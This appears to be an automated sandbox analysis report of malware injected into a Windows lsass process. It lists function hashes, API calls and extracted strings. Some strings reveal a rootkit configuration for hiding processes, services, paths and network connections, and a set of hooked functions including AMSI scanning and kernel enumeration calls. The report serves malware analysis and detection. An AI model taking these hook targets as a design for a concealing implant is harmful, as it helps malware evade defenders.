                                            • Instruction ID: e2bbf7035cdc9e916597a18426b5085288f4986e6ebd83389e25a87e83549494
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: 0C119E3161CF4983FB70A760B9493D962B0AF54345F4C0219958E811D7EFBEC4DB8640
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: 6b752afb91a17aad29154e99fbe11468da530b570cc38a148516e43257cf4422
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: 6A912472B05B5887DB608F25E509BB9B3B1FB45B94F5880299E8D0778FDA38D883C710

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0000017D2DD51724: GetProcessHeap.KERNEL32 ref: 0000017D2DD5172F
                                              • Part of subcall function 0000017D2DD51724: HeapAlloc.KERNEL32 ref: 0000017D2DD5173E
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517AE
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517DB
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD517F5
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51815
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51830
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51850
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5186B
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5188B
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518A6
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD518C6
                                            • SleepEx.KERNELBASE ref: 0000017D2DD51BDF
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD518E1
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51901
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5191C
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5193C
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51957
                                              • Part of subcall function 0000017D2DD51724: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51977
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD51992
                                              • Part of subcall function 0000017D2DD51724: RegCloseKey.ADVAPI32 ref: 0000017D2DD5199C
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: a513e6edbe1b9579d93716c2874b51edf92661d58ab9acfd5c96824e1f791f21
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: 4731DD75208F4981FB509B26FE413F9B3B4AF44BC0F1C58219E0E8769BDEA5D8D38215

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: AllocHeap
                                            • String ID:
                                            • API String ID: 4292702814-0
                                            • Opcode ID: 82b16b63c06e435626d83e20f0b846010868506762bb036dd859b60ff1d78152
                                            • Instruction ID: 4f964bda7fd629f701282419e6a516bb0d39a9f232caa4f350fd376ce586ee1a
                                            • Opcode Fuzzy Hash: 82b16b63c06e435626d83e20f0b846010868506762bb036dd859b60ff1d78152
                                            • Instruction Fuzzy Hash: 81F01CB130EF4CC6FE665B6979423E512B49F847A1F6C6A319D2FD62D3DA2884C38610
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: f2f135d611cdf066e5d6a521eba2869d786744282965d2fc11769e0904ffb0c5
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: D9B16C32218F9883EB658F65E500BE9A3B4FB45B84F485016EE8D53B96DEB5CDD2C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: aed3556e50d0393ba653c5c1e3761f2e9bc91c3f828265de547a951e2544783d
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: 19B17D32218B9883EB669F66E4007D9A3B4FB45B84F6C5016DE8DD3796DE35C983C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: 743912c070fe1f327d28e93256d600cb52e0adf25c8753936ac792564c150e2a
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 1A311972209F8486EB608F60F8407EE6375FB88744F48442ADB4E47B9ADF78C589C750
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction ID: b2e6777ee6f65e9a6b524049aa0a63c7e9474d6c7694a786e7f0fecff4889a0d
                                            • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                            • Instruction Fuzzy Hash: 6C314F72209F8486EB608F64F8407EE7374FB84748F58442ADA4E47B9ADF79C58AC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: e05f22906aac1c5737550f033233ca4beb2db7fc8e70f9253c9fc50d3ade9d7f
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 08415B36218F8486EB60CF25F8403DE73B4FB89794F580615EA9D46B9ADF78C196CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction ID: d0ca0716c541df918f553f98406f679e98901f47d53c00d69067dd5262ecfbc5
                                            • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                            • Instruction Fuzzy Hash: 6E414C36218F8486E7618F25F8403DE73B4FB88794F580625EA8D47B9ADF38C196CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: f51d33f7841fded307b15e8a4b62ad0d3aa425269e7a372565180428a9a7dba0
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 99A1A532708B8989FB20DB75B8407EE6BB1EB45794F1C4115DA9D27A9ADAB8C4C3C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID:
                                            • API String ID: 1164774033-0
                                            • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction ID: 7153a92a0d4b10ed5544accc9fd8ce87a7b4799b68d4a6e65a20dddfeca3b9ae
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: 92A1A332708B885DFB229B75B8407ED6BB1AF457A4F2C4115DA9DA76DADA38C4C38700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 6a5a73e90e15d5065503e619210b3abc3386d86c0bf07523f252400ee6381c03
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: F771E736218F5986EB209F66F8906D933B4FF84B88F481211DE4D57B6ADE78C4C6C780

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 65fb64354005f79140e98f5646543a48e81391d987071b53c93e696e4c4f1b1a
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: C3710636218F5886EB109F35F8917D923B4FF84B88F481221DA4D97B2ADF39C49AC340

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 906870e1520e186d5afb4765476ade36e3d8b0bfe630996f3057a72254ecff36
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 425167B451CF4EA5EA02EFA9FC41BD46B30AF40744F9C8962940D93567DE7986DBC380

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: c9bf57815c647d5cb5a2bf4a54b90c79dd327f0def2c695701b12de31f15661d
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 91512B32218B8896EB24CF62F44839A77B1FB88F98F484124DA4D07759DF7CC08A8780

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 448656f4c821c33dcfb38d4f550e5ec9f8b87264af76efb82c3bb660e2ed0448
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 60512B32218B8896E725CF66F4583DA77B1FB88F98F584125DA4E47769DF39C08A8700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                            • Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 4972e08af1195b3f28e5aa5d2d33d3d318c4d8e495bad8b93d07054ccc4bb4d3
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 39516C31749F4C51EA149B66B8407E922B0AF48BB0F5C07259E3D4B7D6EFB8D4878690

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true
                                            • Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 4387cf98ae7e7cf881c486dddb7d8bf4973e6761fcd2057b11ff659195ec9fc8
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
